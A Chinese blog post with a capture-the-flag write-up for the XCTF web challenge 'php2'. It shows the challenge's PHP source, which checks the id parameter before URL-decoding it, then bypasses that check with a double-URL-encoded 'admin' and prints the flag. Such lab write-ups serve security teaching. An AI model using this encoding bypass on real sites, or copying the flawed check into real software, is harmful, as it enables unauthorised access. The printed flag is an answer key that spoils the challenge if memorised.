首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)

【愚公系列】2021年12月 攻防世界-进阶题-WEB-009(php2)

作者头像
愚公搬代码
发布2021-12-27 08:13:50
发布2021-12-27 08:13:50
3140
举报
文章被收录于专栏:历史专栏历史专栏

文章目录


一、php2

题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=1&page=1

二、使用步骤

1.点击获取在线场景

2.进入页面

index.php

输入地址

代码语言:javascript
复制
http://111.200.241.244:55773/index.phps

得到

代码语言:javascript
复制
<?php
if("admin"===$_GET[id]) {
  echo("not allowed!");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "Access granted!";
  echo "Key: xxxxxxx ";
}
?>

Can you anthenticate to this website?

代码审计,可以看出,get接受id=admin

查看不被允许 进行admin二次编码:%2561%2564%256d%2569%256e 这是url二次编码

代码语言:javascript
复制
http://111.200.241.244:55773/index.php?id=%2561%2564%256d%2569%256e

得到flag:cyberpeace{67cbbc9953933686d0d29409017fa15c}


总结

  • 源码审计
  • 二次编码
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021/12/27 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章目录
  • 一、php2
  • 二、使用步骤
    • 1.点击获取在线场景
    • 2.进入页面
  • 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档